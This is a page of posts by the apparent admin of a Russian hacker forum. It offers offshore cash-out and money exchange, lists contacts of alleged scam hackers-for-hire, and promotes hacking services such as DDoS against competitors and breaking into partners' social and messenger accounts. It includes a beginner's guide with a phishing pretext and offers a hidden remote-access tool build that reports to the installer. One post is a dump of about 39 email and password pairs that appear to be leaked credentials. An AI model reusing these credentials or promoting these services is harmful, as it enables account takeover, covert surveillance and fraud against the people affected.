Перейти к содержимому


Admin

Регистрация: 03 июл 2016
Offline Активность: апр 24 2024 05:24
****-

#357 Обмен и вывод средств. (Администрация)

Написано Admin : 07 Май 2016 - 10:02

Здравствуйте уважаемые друзья и гости нашего форума.

Администрация XAKERAM предлогает вам выгодный обмен электронных денег, Яндекс деньги, Qiwi, WebMoney, Perfect Money, BTC.

Обмен осуществляется на сумму не более 14.000р единоразово, по желанию можно повторить операцию но не более 10-ти операций в сутки для одного клиента.

А также совершим любые финансовые операции по выводу и обналичиванию средств (Оф-шор).

Быстро, качественно, конфидециально.

Низкие проценты за обмен.

Операции Offshore обсуждаются отдельно в Telegram.


Обращайтесь:


E-mail:
XPRU@PROTONMAIL.COM


Telegram: @Временно не доступен


Для уточнения или по каким либо вопросам

можете обратиться на прямую к администратору форума.



Прикрепленные изображения

  • image.jpg

  • Это нравится: Admin


#344 Черный список.

Написано Admin : 04 Май 2016 - 12:02

Доброго времени суток уважаемые гости и друзья форума опытных хакеров! Сегодня я хочу предложить список самых популярных кидал в сфере взлома на заказ. Если вас обманули, пиши контакты хакера в теме!!!!! Сортировка по email: 122115@mail.ru 21216@mail.ru 3lom4ik@mail.ru 2512888@mail.ru 6576432@gmail.com 923667@gmail.com 979365@gmail.com acab@crimeon.com admin@crimeon.com aooyes.com akk.info.com@gmail.com alaridsusan@yandex.ru aleksandr_hak@inbox.ru aleksandrturop@gmail.com algonco.com andrey.savelin@mail.ru andrey_fofanov@bk.ru ngelskaya@mail.ru Anjelina_kr@list.ru anjelina-kr@yandex.ru anonim@hacksystem.ru aanonim.kiber.com@gmail.com antiemail@eml.cc anton1985v@mail.ru arslan011212@mail.ru artem.6508@mail.ru artem.andreev2014@yandex.ru vkeypro@mail.ru vlad.vz@mail.ru vlechenko97@mail.ru VP770066@email.ru vz-vk@list.ru vzll.pochta@gmail.com vzlom@hackerku.net vzlom@live.com vzlom64bit@gmail.com vzlom_vzlom86@mail.ru vzlom-odnoklassnikov.net vzlom.alexei@gmail.com vzlom.life@gmail.com vzlom.nazakaz@yandex.ru vzlom.profi@gmail.com vzlom.service@gmail.com vzlom.sistema.dos@gmail.com vzlom.soc@gmail.com vzlom.na.zakaz@gmail.com vzlom-voronin@mail.ru vzlom.vzlom.vzlom@gmail.com vzlom.x.com@gmail.com vzlom-anket@yandex.ru vzlom-na-zakaz.com vzlom-xakk@yandex.ru vzlom64bit@gmail.com vzlomaem.com@gmail.com vzlomai@outlook.com vzlomal82@gmail.com vzlomnikita@mail.ru vzlomov.ru@mail.ru vzlomPro@live.ru vzlomseti@gmail.com vzlomseti.my1.ru vzlomvkontakte.net vzlomvkontakte3@gmail.com vzlomzona.narod.ru vzlomzona@gmail.com w.hanter@outlook.com welcometousluga@gmail.com www.dosug@gmail.com x4000800@gmail.com xak.pass@bk.ru xak16@bk.ru xakep-1989@ya.ru xaker3902@gmail.com xaker.brut@gmail.com xakep.ing@gmail.com xaker.klub@yahoo.com xakep.ok@bk.ru xakker@outlook.com xspiriton@yahoo.com xsslook@outlook.com z.vzloma@yandex.ru zakaz.com@mail.ru zakaz.na.vzlom@yandex.ru zakaz.v.net@yandex.ru zakaz.vzloma.84@gmail.com zakaz-email@xakep.ru zakaz-vzloma@hack-pass.com zakaz-vzloma.net zakaz-vzloma@inbox.ru zakaz-vzloma-vk@hotmail.com zakazvzloma.com zakazemail@yandex.ru zevskom@yandex.ru zharikov.petechka@mail.ru zonavzlom@yandex.ru asc@mail.ru aypro@list.ru barnyhack@yahoo.com bedoev.artem@mail.ru bondar_andreyy@ro.ru breaking_91@mail.ru bronny@xaker.ru brytto_joker@bk.ru bunker001hackers@gmail.com bypassxx@gmail.com chaiko.11@mail.ru carina.hack@yandex.ru chestnyihaker@mail.ru ck94@bk.ru ck094@yandex.ru cool.amo2010@yandex.ru corp@eml.cc crackpas@gmail.com darkman_nv@mail.ru darth.venom1@rambler.ru davzlom@mail.ru ddos.hackerr@gmail.com defix@bk.ru dekoff.i@yandex.ru den-hacker@bk.ru dima-po-vzlomy@yandex.ru dimon.d.a.joper@mail.ru dmilat75@mail.ru doctor-info@mail.ru dostrova@inbox.ru dr.clows@yandex.ru dron.anonim@mail.ru ehacking@mail.ru egor.preobrajenski@gmail.com ehacking@outlook.com engineengs@gmail.com enjoy.prohacking@gmail.com evgeniy-kovalev1994@mail.ru ex8pert@mail.ru expert@ojooo.eu fenix592@gmail.com fenix592@rambler.ru festaxoff.valera@yandex.ru forum-hackeroff.ru garantprohack@gmail.com georg.iprof@yandex.ru gfdtk-8d@bk.ru gohackpro@gmail.com good-b2b@mail.ru good-hack@yandex.ru grandsioz@yandex.ru grinA@gmail.ru grinahack.ru grinahelp@ukr.net grinahelp@gmail.com gvlechenko@bk.ru gvlechenko@mail.ru hack-pass.com hack-pass@bk.ru hack-vk.com@bk.ru hack.haman@gmail.com hack.lebedev@yandex.ru hack.log.and.pass@gmail.com hack.portal@yandex.ru hacker.80@yandex.ru hacker.email@yandex.ru haker.maksimka@mail.ru haker089@yandex.ru hakerok.86@gmail.com hackerproff.fast@gmail.com hackerpromail@gmail.com hackers.2006-2012@yandex.ru hackers_2014@yahoo.com hackharlem@gmail.com hackinghelp@yandex.ru hackmarke@yahoo.com hackmidle@gmail.com hacks-all@yandex.ru hakedmaster@gmail.com hakervzom@gmail.com HaksOpen@gmail.com hank.luk@gmail.com HardBass09.p.ht High.Quality.Hacking@yandex.ru high-quality-hacking@yandex.ru icexakep2013@yandex.ru info-07@mail.ru installWorld@yandex.ru ithackexpert@gmail.com JABBER: w.hanter@jabber.org jackhelp@hotmail.ru jackhelp@yahoo.com jaovs1@yandex.ru kaisa59@rambler.ru kay@eml.cc kc1hacker@gmail.com kirillpetrenko@ymail.com kodq@fromru.com kornilov-hack@ya.ru kornilov-hack@yandex.ru korrnev.aleksandr@gmail.com KozaNostra777@hotmail.com krystiza@mail.ru krollik@bk.ru kukla1393@mail.ru kurbanov.hack@yandex.ru kurbanov-hack@ya.ru labin.oleg@yandex.ru lamer.vzlom@gmail.com lazykent91@gmail.com lekomtsev_r@mail.ru lenya.demchenko@mail.ru line-box@mail.ru lamer1221@ya.ru Lnchshij3@yandex.ru lomaemmilo@mail.ru lommila@mail.ru mail–miedkov89@mail.ru mail.boss7@gmail.com mail.crack@yandex.ru mail.crack.ru@yandex.ru mail_crack@rocketmail.com mails-open@yandex.ru mails.passw@gmail.com MailsWizard@gmail.com makarov.hack@yahoo.com mastxack@gmail.com motherfuker1337@yandex.ru mazahacka.ru@mail.ru mega-hack87@mail.ru mega_volt_hack@yahoo.com mi1anchik@yandex.ru miedkov89@mail.ru misha.uslugi.vzloma@gmail.com moikontakty.narod.ru molhan@inbox.ru moon.anneta@mail.ru mr.white.goodhacker@gmail.com motherfuker1337@yandex.ru ness@xaker.ru nadtoka.hakcer2010@yandex.ru nikita-popov93@yandex.ru nindeti@mail.ru olgavzlom@rambler.ru orpbox@mail.ru onhack@live.ru online.hackvzlom@gmail.com pas.s.fes@gmail.com pass.vxl@gmail.com passkey14@mail.ru passv.xl@gmail.com pass-2015@yandex.ru passfes@gmail.com Pavel.Hakk@mail.ru Pavel.Hakk@yandex.ru Pavel.Hakk@gmail.com petrikov-1989@inbox.ru petrulip1@mail.ru petrulip2@mail.ru pet1482@yandex.ru pochta809@bk.ru pochtallx@mail.ru pogdevelopers@gmail.com pomoguvzlomat@gmail.com povel1988@mail.ru powerofhack@yahoo.com pro.haker@bk.ru pro.vzlom@bk.ru pro.vzlom.profil@gmail.com PROFIvzlom@ya.ru professional@programist.ru proffi_vzlom@bk.ru progproff@yandex.ru promaster499@gmail.com promhack@ymail.com pros89@bk.ru prospeedhack@gmail.com provzlom@live.ru provz1om@yandex.ru Pro-vzloma@yandex.ru pro-vzloma2009@ya.ru rack.sascha2016@yandex.ru rad4uk@yahoo.com radchuk-it@mail.ru rich.hacker2014@yandex.ru robin.pass@ymail.com romantsev.eduard@mail.ru roma.starkov.88@mail.ru roman.dudarew12@yandex.ru ruhak@xaker.ru RussianHackService@yandex.ru saita.moderator@yandex.ru satoret@yandex.ru sgegory@ymail.com servis@programist.ru shellhacker78@gmail.com sidr.nikolay@mail.ru siti.scan@mail.ru slava.hax@yandex.ru slomaem@xaker.ru sochelper01@gmail.com solovev.vasyusha@inbox.ru spyhacker@mail.ru stepan.vzlom@yandex.ru super.hackzone@yandex.ru support@hackergate.net tdssdos@gmail.com tolikzakharov@yandex.ua ttomik01@gmail.com unknow.xakep@yandex.ru uslugavk@yandex.ru uslugi.po.vzlomu@yandex.ru uslugi-hackera@rambler.ru uslugi-vzlom@mail.ru uslugivzloma@yandex.ru v-hack@mail.ru vashurkin2012@gmail.com vasya2010z@mail.ru vavasik90@mail.ru vippomoch@xaker.ru vk-od@rambler.ru Сортировка по Skype: abra-kadabra67 abrcadabr67 brytto_joker de7phi good-hack HaksOpen haker20151 KENIROKEN kioto9112 MailsWizard marina_ernest miedkov89 Nikita-popov93 nindeti Skype Pavel_Hakk powerofhack shOrtle shket30144 tx4hack vasya2010z vzlom_hack vzlom.on@yandex.ru vzlom2012 xakermen.xakermen skype@hacksystem.ru Сортировка по icq: 111-111-463 180-220 197-79-33 217-627 220-772 222-84-82 276-71-73 318-319 354-599-095 379-892 403-99-00 465-229-798 474-622-857 479-614 551-837 555-333-777 561-658-721 564-455-785 576-432 576-99-00 577-668-445 589-999-71 602-374-488 603-403-038 605-349-067 605-511-466 611-926-090 615–942-753 616-963-483 617-985-842 623-478-760 633-133-323 633-376-723 633-684-500 649-008-31 650-952-099 654-547-171 655-534-448 656-955-368 657-964-762 667-038-788 675-608-888 677-000-002 681-355-178 681-813-681 684-801-171 688-023-196 692-753-919 696-213-359 943-494-60 996-032 998-98-98 Сортировка по вконтакте: vk.com/id231591923 vk.com/id250053527 vk.com/id126683114 vk.com/id86157862 vk.com/id126683114 vk.com/id226365874 vk.com/id312650110 vk.com/id329445437 vk.com/id38168233 vk.com/ck944 vk.com/dyhaa vk.com/grinahack vk.com/hak.pro81 vk.com/hakervzlom2015 vk.com/lisaveta7 vk.com/mskk2 vk.com/powerofhack vk.com/giprof vk.com/vladimirfedorov88
stanislavpacker@hotmail.com

Если вы нашли хакера к которуму хотели обратиться в этом списке советуем вам предостерегаться! Соблюдайте правила! №1. ПОЛЬЗУЙТЕСЬ ГАРАНТОМ! И ЧИТАЙТЕ XAKERAM.RU (ФОРУМ ХАКЕРОВ И ПРОГРАММИСТОВ)

Прикрепленные изображения

  • 1450969123.jpg



#342 Услуги профессиональных хакеров.

Написано Admin : 04 Май 2016 - 11:07

УСЛУГИ ПРОФЕССИОНАЛЬНЫХ ХАКЕРОВ.
Рад приветствовать каждого пользователя который перешел на XAKERAM.RU Сегодня решил обсудить по-видимому достаточно популярную тему. В которой будем вести обсуждение хакеров и услуги которе они предоставляют. Большая часть сюда перешли в надежде найти специалиста который оказал бы подобные услуги! Я уверен если вы по юзаете мой форум обязательно найдете такого человека. Мир в котором интернет технологии развиваются с бешеной скоростью услуги подобного рода имеют большую актуальность. Практически 70% современного бизнеса услуг связанно с рекламой в глобальной сети.Конкуренция между бизнесменами растет буквально по часам, многие желают применить хитрости и обратиться за помощью к специалистам.Даже пренебрегая законодательством Российской Федерации, давайте рассмотрим основные услуги этого рынка: Блокировка доменных имен: Зачастую возможная конкуренция разворачивается между сайтами. Которые пытаются вылезти в топовые позиции поисковых систем.Пренебрегая рядом фактором соперники готовы на любые шаги! Один из лучших вариантов заставить отступить своего оппонента. Заблокировать домен его сайта, во-первых это отразится на всей СЕО компании примененной к сайту! Во-вторых, подобные действия испугают вашего врага от подобных посягательств на клиентов. ДДос атаки: Еще один вариант опустить конкурента с небес на землю, обращаясь к хакеру за услугами досс. Вы гарантированно получаете временное отсутствие потенциального недруга в сети. Преобладая в поиске в это время.Отметим заблокировать домен выйдет достаточно дешевле чем, постоянно пользоваться досс атаками.Удаление негатива: За годы работы в сфере хакинга, ко мне обращались различные люди с различными проблемами. Частенько были соотечественницы жившие в Европе или Соединённых Штатах Америки. Засветившиеся на порталах связанных с порнографией. Приходилось удалять всю информацию, которую оставляли бывшие работодатели девушек.Личности с просьбой удалить фейковый аккаунт в tweetr и других социальных сетях. Подобные услуги хакеров стоят достаточно хорошо, и многим увы не по карману.Удаления негативно содержащего видео на youtube, администрации лояльно относится к видеозаписям содержащим информацию о какой-либо личности. Вспоминаются на моей памяти и негативные клиенты! Помните по всей стране ходили видео с большим накаченным скинхедом по имени ТЕСАК? Занимался он ловлей педофилов на живца, после чего избивал недолюдей и выкладывал запись в всемирную паутину.За лето когда этот парень проявлял максимальную активность ко мне обратились десятки педофилов с просьбой удалить и заблокировать аккаунт. Сейчас я подобным вещами не занимаюсь, скажу откровенно я их обманывал! Удалял запись, получал оплату сразу же восстанавливал!Считая действия этих людей аморальными, думаю я имел на это полное право и гражданскую позицию!Удаление отзывов:Пакости ненавистников и конкурентов, оставляют негативную информации о честных людях в интернете!Найти проверенного хакера который произвел удаления подобных тем достаточно тяжело. Необходим специалист оказывающий услуги не первый год своим клиентам. Представьте обыкновенный риэлтер, честный оказывающий не дорогие услуги. В общем пользующейся спросом знаток своего дела. Создается простая тема на форуме, и начинаются зарисовки негативных отзывов. Мол дилетант, обманул меня на кругленькую сумму! Если завистник вашей популярности заходит достаточно далеко, таких сообщений может быть очень много! Когда тема появляется в индексе сделать практически не чего нельзя. Особенно когда администрация форума не активна или принципиальна!Приходится пользоваться услугами специалистов, в данном случае хакеров. Платить деньги не понятно за что! Взлом социальных сетей: Нанять хакеры для взлома вконтакте или одноклассников, рядовое занятие! Тысячи людей пытаются сделать это ежедневно.Проверить любимую девушку на верность, или с кем общается ваш парень обыдённые причины обращения к программистам самоучкам.Читать мессенеджеры сообщений:Смартфоны, определить место расположение и многое другое. Все это под силу сделать обыкновенному взломщику. Вибер и whatsapp, стремительно завоевывают место подобных приложений в нашем обществе. Судя по росту выходит достаточно удачно! Русский человек от природы любит халяву, вибер и есть бесплатный вариант отправлять сообщения пользователям по всему миру! Как правильно заказать услуги у хакеров:Все большую актуальность подобные услуги взлома обретают у человечества в целом. Многие понимая этот факт, но не имея возможность предоставить их! Становятся мошенниками, обманывающими рядовых граждан.Расскажу принцип работы с хакерами без обмана:
№1. Обращайте внимание на опыт работы этого человека, если по каким либо причинам у вас хакер требует оплату в перед, это совсем не означает что он мошенники, сейчас многие работают по предоплате. Почему объяснять здесь не могу, спросите у тех кто предлагает услуги и если ответ вам покажется адекватным то и развернутым вы всё поймете. Если же начинаются отговорки не дающие нормального ответа на вопрос, то советуем предложить работу через гаранта.
№2. Предлагайте работать через гарант сервис, работая через гарантов у вас будет возможность получить услуги которые вы заказывали!Честный и профессиональный гарант стоит достаточно не дорого. Порядка 7% от суммы сделки.Если исполнитель согласился работать через гаранта это уже характеризует его с положительной стороны.
№3 Как правило, старайтесь просить предоставить доказательства выполненной работы, только после этого следует уведомить гаранта о завершении сделки!

Прикрепленные изображения

  • 8f718ec85c8d2b0f45effbfb13a458ac.png



#321 Как стать хакером с нуля.

Написано Admin : 03 Май 2016 - 09:33

Основы. Привет, читатель. Год назад я пришёл на ХЗ, и очень хотел стать хакером. Никто не мог мне обьяснить многие простые вещи, я видел много опытных, но стать на путь хакера мне помогли буквально единицы. И я могу их назвать: PinkPanther, DrWeb, R_a_ID_e_R. Я обучался сам, не надеясь ни на чью помощь, стараясь описывать свои познания в статьях для новичков. Так шло время, менялись поколения... Я не хочу усложнять жизнь ньюбов, я всегда к ним хорошо относился, и я считаю, что новички меют право знать. Тот, кто скажет, что я неправ, что мол "пусть сами разбираются, только так они вырастут", и прав и неправ. Да, упорные достигнут своей цели, но человек, которому это не надо, просто не будет читать эту статью. Тем, кто до сих пор мучает поисковики вопросами типа как стать хакером с нуля я решил посвятить цикл уроков, а может, и книгу. Ты пройдёшь путь от ламмера до хакера, изучишь технологии программирования, взлома и многое-многое другое. Проходи этот путь по моим урокам, и всё будет ОК, Это первый урок, посвящённый азам хакерства, он скорее завлекающий. Помни, всё это только игрушки, а настоящее хакерство пойдёт потом. А на этом этапе ты должен решить, нужно оно тебе, или нет. Постепенно мы изучим сетевые технологии, ты узнаешь, как устроен Интернет, что можно в нём найти интересного, что можно, а что нельзя. Добро пожаловать в наш мир хакер! Итак, темы на сегодняшний урок: Идеология хакера Ответственность Путь хакера P.s Рекомендуем так же: icq password recovery Идеология хакинга. Хакинг – это почти религия. Если ты окунулся в этот мир, то не сможешь уйти из него никогда. Хакинг это не хобби, это даже не работа (хотя многие зарабатывают на этом), хакинг – это жизнь! У многих слово "хакер" ассоциируется с эдаким ботаником, день и ночь взламывающим банки и переводящим себе кучу денежек, неустанно беспрерывно сносящим сотни серверов одним ударом без причины. Хочу тебе сказать, что эта мысль в корне неправильная. В этом уроке мы пока еще не будем вскрывать банки (ну разве что банку пива:)), мы поговорим о том, кто такие хакеры, что они делают и какими мотивами руководствуются. Согласно определению, хакер - человек, увлекающийся компьютерами, и испытывающий желание знать о них всё. Запомни, что просто так ничего не происходит, и У любого взлома есть цель, мотив, взломщик и ОТВЕТСТВЕННОСТЬ. При взломе хакером движет элементарное любопытство, желание проникнуть внутрь, найти уязвимость. Если ты со мной не согласен, тебе просто нет смысла читать дальше. Пожалуй, сразу стоит определиться с терминами. Ламер – это не тот кто не знает. Это человек, которые не стремится узнать. Причем, он как правило считает себя опытным хакером. Это классический ламер. Новичок – почему то всегда путают ламера с новичком. Новичок еще мало знает, но он стремится узнать. Хакер – это прежде всего создатель, а не взломщик. СМИ запудрила людям мозги, спутав хакеров и крекеров. Крэкер это как раз взломщик. Правда сейчас у этого термина немного другое значение. Сейчас крекером является человек, которые взламывает программы и игнорирует любые копирайты. Вообще хакер- это вселенский энтузиаст. Давайте будем энтузиастами! Для начала ты должен уметь использовать поисковики. В Инете говорят, google - твой лучший друг. Если у тебя есть какой-либо вопрос, не спеши с ним на форум, поищи уже готовые ответы, ведь наверняка ты не первый, кто его задает. Если ты научишься владеть поисковиком, то дальнейшее изучение не составит проблем. На 90% твоих вопросов ответы есть в Интернете. Конечно, на форумах на адекватный вопрос всегда дадут ответ. Ты всегда можешь попросить помощи у более опытных людей. Но рано или поздно придет время самостоятельно принимать решения, находить выходы из ситуаций. Именно этому я тебя учу - ты должен обладать творческим мышлением, уметь адаптироваться к новым условиям. У всех новичков один вопрос – «С чего начать?» Я бы советовал начать с изучение английского языка, т.к. базовый язык для машин, как раз английский. Если у тебя с этим туго советую немедленно скачать учебник, либо записаться на курсы. Многие говорят, что нужно научиться быстро набирать текст. Это так. Но не стоит скачивать какие то специальные программы. Со временем ты сам не заметишь, как будешь вслепую набирать текст. Ответственность. Что же за ответственность? Думаю догадаться несложно. Существуют статьи УК, в которых описаны наказания за компьютерные преступления. Приведу некоторые: Статья 159. Мошенничество Статья 165. Причинение имущественного ущерба путем обмана или злоупотребления доверием Статья 183. Незаконное получение и разглашение сведений, составляющих коммерческую или банковскую тайну Статья 187. Изготовление или сбыт поддельных кредитных либо расчетных карт и иных платежных документов Статья 272. Неправомерный доступ к компьютерной информации Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ Статьи КоАП РСФСР Статья 137. Изготовление и использование радиопередающих устройств без разрешения Статья 138. Нарушение правил приобретения, установки, строительства и эксплуатации радиоэлектронных средств Статья 139. Нарушение правил охраны линий и сооружений связи Статьи УК РФ Статья 137. Нарушение неприкосновенности частной жизни Статья 138. Нарушение тайны переписки, телефонных переговоров, почтовых, телеграфных или иных сообщений Статья 183. Незаконное получение и разглашение сведений, составляющих коммерческую или банковскую тайну Статья 272. Неправомерный доступ к компьютерной информации Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ. Предположим ты взломал сервер. Но так как ты новичок забыл затереть логи. И твой ip(айпи) адрес остался на сервере. Теперь если администратор обнаружит вторжение, он может смело может пожаловаться твоему провайдеру. Провайдер проверит, кому принадлежал это адрес в указанное время. И твой телефон и домашний адрес у них в руках. Как Далее - если будет написано заявление в милицию, тебя ждет одна из выше перечисленных статей. Но заявления может и не быть. Провайдер просто отключить тебя от Интернета. Это в лучшем случае. Вообще могу сказать, что лучше всего хранить конфиденциальные данные на CD в запароленном архиве с очень сложным паролем и измененным расширение, либо на флеш носителе, как первый, так и второй уничтожить не составит труда. Путь хакера. Здесь и сейчас, с этого момента, начинается твой путь в хакеры. Где-то в Интернете я видел интересное высказывание: лучший админ - это хакер, и наоборот - лучший хакер - злой админ. Отчасти это правда. Подобно тому, как хороший боец должен хорошо владеть оружием, хакер должен хорошо владеть компьютером. Они знают по нескольку языков программирования, разбираются в операционных системах, знают, как устроен компьютер и могут собрать и разобрать его за 45 секунд). Чтобы успешно находить уязвимости в скриптах, ты должен знать, по какому принципу они работают, а чтобы это понять, надо знать язык, на котором они написаны. Не обязательно знать прям всё, но что-либо стать альтернативное из каждой группы языков ты должен выбрать. Вот основные языки, которыми пользуются хакеры. Из каждой группы выбери один-два языка: •Ассемблер •Delphi | С/C++ | Visual Basic •HTML, XML, WML •PHP | ASP | JSP | Perl •SQL и кoмпания Не обязательно учить всё сразу, чтоб не говорил, что я тебя запугиваю. Жирным выделены обязательные языки. По возможности найди как можно больше учебников для дальнейшего изучения. Ассемблер используется для взлома shareware-программ, для создания кряков и кейгенов. Дальше. HTML, PHP, ASP, Perl, JavaScript, VBS, JSP, и многие другие объединяют в одну группу - это "веб-языки". При помощи них создаются веб-сайты, например HackZona написана на PHP. настройка кардшаринга HTML - это не язык программирования. Его название переводится как "HyperText Markup Language" - "язык гипертекстовой разметки". Т.е. при помощи него не программируют, а только "размечают" документ, показывая компьютеру, где какие данные должны быть. Как говорилось в предыдущем уроке, если при написании сайта ограничиваться хакером только этим языком, то мы просто задаём: здесь рисунок, а тут ссылка, а тут такой-то текст. Таким образом, при каждой загрузке страницы мы увидим одно и то же: рисунок, ссылка, текст. А вот если прикрутить к документу скрипт, написанный на PHP, мы можем указать, что при загрузке рисунка можно выбрать из базы данных, например, ту картинку, что нравится пользователю. Таким образом, они друг друга дополняют. Ты должен чётко ощущать разницу между веб-дизайном и веб-программированием. XML - это тоже язык гипертекстовой разметки, дающий большую гибкость, чем HTML, однако, его тебе пока учить не стоит. WML - разномидность XML, используется для создания wap-сайтов. PHP и Perl - наиболее часто используемые языки веб-программирования. CSS - каскадные таблицы стилей. Это надстройка HTML, используется для визуального украшения документа - неподчёркнутые ссылки, цвет полосы прокрутки, рамки, анимация, и многое-многое другое. Оригинальная версия этой статьи написана с использованием css. Украшены ссылки, элементы списков, рамки для кода и правил, и др. Если ты читаешь статью с HackZona.ru, то перед тобой не оригинальная статья, хотя это никак не отражается на сути урока. Delphi, С/C++/C#, Java, Visual Basic, QBasic, Dark Basic, Pascal, Fortran, etc. - это "прикладные" языки. Приложения, созданные в этих средах разработки, носят расширение *.exe . {+ хотя файлы php - тоже приложения +} SQL - язык баз данных. Ты, наверное, слышал термин SQL injection? Мы к нему вернёмся через несколько уроков. Это уязвимость, позволяющая хакеру вытаскивать данные из базы, передавая их вместе с PHP-запросом. И для этого нужно изучить SQL. Ты сам понимаешь, что учить тебя этим языкам я не буду, я буду учить тебя их использовать. То, что тебя интересует, найдёшь сам. Теперь поговорим немного об ОС (операционная система). Сейчас ты наверняка сидишь под Windows. Кроме windows существуют системы семейства unix, их еще называет *nix (никсы). Юникс систем очень много приведу несколько: Linux, BSD, Solaris. Пока об этом стоит только читать, но в будущем советую поставить какой нибудь дистрибутив Linux, так как эта система как никакая другая подходит для взлома. Существуют разные подвиды хакеров, занимающиеся разными видами деятельности: •Хакинг •Крэкинг •Фрикинг •Социнженеринг/фишинг •Кардинг •Кодинг Каждый занимается чем то своим. Но, например веб хакинг, социнженерию и кодинг можно объединить. Так как в деле одно может дополнять другое. Давайте разберемся со всем этим поподробнее: Хакинг – этим собственно и занимаются хакеры. В этот раздел можно отнести взлом сайтов серверов поиск уязвимостей в скриптах & прикладных программах, написание эксплоитов (или другое название сплоиты) Крэкеры (это не печенье;)) занимаются исследованием начинки программного обеспечения, в частности получение алгоритма генерации серийного номера в платных программах, исп. для создания кейгенераторов. Для этого надо знать ассемблер, чтобы понимать, как устроена программа. Фрикеров часто связывают с электроникой. Фрикер - любитель халявы, который привык не платить за услуги, связанные с электроникой. К этому относят взлом таксофонов, счетчиков, теликов, и т.д. и т.п. Естественно, чтобы этим заниматься, нужно иметь глубокие познания в электронике. Мой папа по образованию - инженер-электронищик. Я 16 лет жил в одной квартире с величайшим фрикером, не зная этого. Социальная инженерия - это единственная наука из всех названных, направленная не на взлом компьютера, а на взлом человека. Сейчас в Сети очень много ламмеров, и элементарно выманить их пароли оказывается достаточно просто. Например, выдать себя за админа почтового сервиса, или тех. консультанта организации, и сказать, что мол поступила жалоба на спам с Вашего ящика, если не хотите его удаления, отошлите такое-то письмо на почтовый робот такой-то, укажите свой логин, пароль, и этот код доступа: 46655529 (цифры наугад), и он поверит. Социнженеринг(далее СИ) применяется там, где единственное уязвимое место в системе - пользователь. Пример: зачем ломать mail.ru если можно обмануть юзера? Кардинг - манипуляции с кредитками, мардинг - маниакальное уничтожение взломанных систем. На этих пунктах мы останавливаться не будем по понятным причинам. Конечно, кое-кто раскритикует такое разделение, но новички должны знать эти понятия. Не бывает так, что хакер опытен только в одном деле и безразличен к другим направлениям. Это деление чисто условное. Кодинг - программирование с точки зрения хакерства. Всё, ты уже стал на путь хакерства. Вводные уроки закончились, в следующий раз мы поговорим о более серьезных вещах. Я начну рассказывать тебе о том, как устроен Интернет, какая в нем адресация, что такое IP,порты,proxy и т.д. Приложение Как стать хакером с нуля Советую почитать книгу "HTML.Первые шаги". Для ознакомления с HTML это просто НАХОДКА. Учебник написан понятным языком, с примерами кода, иллюстрациями. Респект автору. Для изучение PHP подойдет книга PHP в подлиннике. По линуксу(linux) подойдет книга «Введение в Linux» Все вышеприведенное можно найти в сети с помощью поисковика google.

Прикрепленные изображения

  • image(2).jpg

  • Это нравится: RinJi


#269 Свежая пачка майл

Написано Admin : 28 Февраль 2016 - 10:45

taran_natalia@mail.ru;260387
salatoff_86@mail.ru;05111986
4ek45@mail.ru;181163
pidometr@mail.ru;230885
irina_igrineva@mail.ru;qwerty
hjvfyabkbggjd@mail.ru;05121979
yt1eotju@bk.ru;qwerty
piniava@mail.ru;piniava
1231eqwe13@mail.ru;qwerty
cvbm12@mail.ru;qwerty
lilechikvolkowa@mail.ru;07051990
bogdanova1502@mail.ru;15021968
roma311986@mail.ru;qwerty
ukraine147@mail.ru;qwerty
sdgdsfhgdrgthgfhfdh@mail.ru;qwerty
granny_sa@mail.ru;210194
lazareva17777@mail.ru;080973
amigos_aipet@mail.ru;qwerty
lilya_doktor@mail.ru;060879
nikkl90-90@mail.ru;200790
sanya_23_93@inbox.ru;23081993
nikulina-65@mail.ru;10091965
skomorohina@mail.ru;skomorohina
ambal666@list.ru;05101995
kireev-vova@mail.ru;270680
05ruslan90@mail.ru;060290
lech18@mail.ru;qwerty
roma.shevchuk@list.ru;101283
ualihanov.gu@mail.ru;qwerty
thuongtula@mail.ru;26071985
boris.brutal@list.ru;qwerty
967173@mail.ru;qwerty
ljvhbcnrf@mail.ru;ljvhbcnrf
olesya-bogus@mail.ru;17121981
saneok__91@mail.ru;280391
kwotyan@mail.ru;kwotyan
tanyaef@mail.ru;tanyaef
troyanskaya_79@mail.ru;260579
svetlana.kotova@bk.ru;17011975



#262 Скрытая сборка RMS 6.3.0.6 с отправкой ID на почту

Написано Admin : 28 Февраль 2016 - 10:18

ИзображениеСкрытая сборка RMS (remote manipulator system) 6.3.0.6 с отправкой ID на почту , пароль всегда 12345.
Все что нужно - создать reg файл в программе RG.exe, в программе вводим почту и создаётся reg файл реестра его переносим в архив сервера Build.exe (не папку!)



#259 Словари для брута

Написано Admin : 28 Февраль 2016 - 10:11

Словарь русских слов, набранных в латинском регистре скачать
Большой русский словарь скачать
AllWords2 - 3 миллиона английских слов скачать
Beale wordlist - 7776 слов скачать
Unabridged dictionary - около 200 000 слов скачать
Big Dictionary - около 500 000 слов скачать

  • Это нравится: Admin


#253 10 лучших вирусов

Написано Admin : 28 Февраль 2016 - 09:54

Melissa
 
Едва ли программист из Нью-Джерси задумывался о том, чтобы собрать ботнет из миллионов машин и использовать его для рассылки спама. Вряд ли он мог представить последствия, создавая своего, казалось бы, безобидного червя Melissa. Ведь даже распространение тот начинал не с инета — впервые червь был обнаружен 26 марта в конференции alt.sex внутри Usenet — в то время еще популярной сети для общения и обмена файлами. К сообщению был приложен файл List.DOC, содержащий пароли на 80 порнушных сайтов: позарившись на «клубничку», файлик с радостью открыли многие. А дальше пошло-поехало: червь тут же начал распространение, отправляя себя по 50 первым контрактам из записной книжки пользователя. Это был первый успешный червь, распространяемый через e-mail.
Когда Melissa открывает зараженный документ MS Word 97/2000, запускается специальный макрос, который рассылает копии червя в сообщениях электронной почты при помощи обычного Outlook’а. Для этого червь юзает возможность Visual Basic активизировать другие приложения MS Windows и использовать их процедуры. Вирус вызывает MS Outlook, считывает из адресной книги первые 50 email’ов и посылает по этим адресам сообщения. Написав в мессаге текст аля «Вот документ, о котором ты меня спрашивал», червь приаттачивал к письму текущий открытый документ пользователя, предварительно заражая его. Последнее, кстати, повлекло за собой массу курьезных ситуаций и, в ряде случаев — утечки конфиденциальной информации. В 1999 году пользователи даже не задумывались о том, что в аттаче от известного им адресата может быть какая-то зараза, и активно открывали вложения.
Стремительное распространение вируса серьезно нагрузило почтовые серверы — им пришлось обрабатывать на несколько порядков больше отправлений, чем обычно. Тысячи машин по всему миру не выдержали нагрузки и вышли из строя. К 27 марта распространение вируса приняло характер эпидемии; 29 марта он проник уже на компьютеры всех стран мира, подключенных к Сети, в том числе и на российские.
